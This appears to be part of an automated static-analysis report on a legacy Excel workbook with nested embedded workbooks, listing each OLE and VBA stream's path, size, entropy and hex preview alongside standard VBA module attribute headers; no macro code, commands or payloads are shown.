                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 d5 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "ThisWorkbook"
                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet1
                                              VBA File Name:Sheet1.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 15 f4 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet1"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet2
                                              VBA File Name:Sheet2.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] & g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 26 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet2"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/Sheet3
                                              VBA File Name:Sheet3.cls
                                              Stream Size:977
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 1e 0d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "Sheet3"
                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:MBD017EF322/_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:985
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                              Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5d c7 d5 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Attribute VB_Name = "ThisWorkbook"
                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                              Attribute VB_GlobalNameSpace = False
                                              Attribute VB_Creatable = False
                                              Attribute VB_PredeclaredId = True
                                              Attribute VB_Exposed = True
                                              Attribute VB_TemplateDerived = False
                                              Attribute VB_Customizable = True
                                              

                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:114
                                              Entropy:4.25248375192737
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.889430592781307
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:200
                                              Entropy:3.268293668191049
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . 8 . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                              General
                                              Stream Path:MBD017EF320/\x1CompObj
                                              File Type:data
                                              Stream Size:99
                                              Entropy:3.631242196770981
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF320/Package
                                              File Type:Microsoft Excel 2007+
                                              Stream Size:11564
                                              Entropy:7.132901381496351
                                              Base64 Encoded:True
                                              Data ASCII:P K . . . . . . . . . . ! . . o . . . L . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a2 c8 b4 f4 6f 01 00 00 4c 05 00 00 13 00 cb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 c7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF321/\x1CompObj
                                              File Type:data
                                              Stream Size:114
                                              Entropy:4.25248375192737
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF321/\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.889430592781307
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path:MBD017EF321/\x5SummaryInformation
                                              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
                                              Stream Size:120200
                                              Entropy:4.560418312417174
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path:MBD017EF321/MBD017ED236/\x1CompObj
                                              File Type:data
                                              Stream Size:99
                                              Entropy:3.631242196770981
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF321/MBD017ED236/Package
                                              File Type:Microsoft Excel 2007+
                                              Stream Size:7880
                                              Entropy:6.5489983015138815
                                              Base64 Encoded:True
                                              Data ASCII:P K . . . . . . . . . . ! . X V . ` . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 58 56 c6 8f 60 01 00 00 18 05 00 00 13 00 da 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d6 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF321/Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:151951
                                              Entropy:7.683490359133683
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . l . 9 P . 8 . . . . . . . X . @ . . . . .
                                              Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              General
                                              Stream Path:MBD017EF321/_VBA_PROJECT_CUR/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:520
                                              Entropy:5.18674908320575
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { E 6 0 3 B E 4 9 - 3 B E 4 - 4 9 D 7 - 9 5 7 C - E 1 6 A B 7 6 4 E 9 E 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 2 2 0 2 4 C A 1 4 C E 1 4 C E 1
                                              Data Raw:49 44 3d 22 7b 45 36 30 33 42 45 34 39 2d 33 42 45 34 2d 34 39 44 37 2d 39 35 37 43 2d 45 31 36 41 42 37 36 34 45 39 45 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                              General
                                              Stream Path:MBD017EF321/_VBA_PROJECT_CUR/PROJECTwm
                                              File Type:data
                                              Stream Size:104
                                              Entropy:3.0488640812019017
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              File Type:data
                                              Stream Size:2615
                                              Entropy:3.966034925838034
                                              Base64 Encoded:False
                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                              Data Raw:cc 61 85 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                              General
                                              Stream Path:MBD017EF321/_VBA_PROJECT_CUR/VBA/dir
                                              File Type:data
                                              Stream Size:553
                                              Entropy:6.393413723460345
                                              Base64 Encoded:True
                                              Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . e . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                                              Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 bc bb 86 65 0c 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                                              General
                                              Stream Path:MBD017EF322/\x1CompObj
                                              File Type:data
                                              Stream Size:114
                                              Entropy:4.25248375192737
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              General
                                              Stream Path:MBD017EF322/\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:244
                                              Entropy:2.889430592781307
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path:MBD017EF322/\x5SummaryInformation
                                              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\370\371\371\371\372\372\372\370\370\370\362\362\362\352\352\352\336\336\336\321\321\321\325\325\325\332\332\332\336\336\336\340\340\340\340\340\340\337\337\337\335\335\335\336\336\336\336\336\336\336\336\336\335\335\335\334\334\334\332\332\332\327\327\327\326\326\326\325\325\325\325\325\325\324\324\324\324\324\324\323\323\323\324\324\324\330\330\330\334\334\334\335\335\335\334\334\334\331\331\331\324\324\324\316\316\316\322\322\322\327\327\327"
                                              Stream Size:120200
                                              Entropy:4.560271435258422
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00
                                              General
                                              Stream Path:MBD017EF322/MBD017ED236/\x1CompObj
                                              File Type:data
                                              Stream Size:99
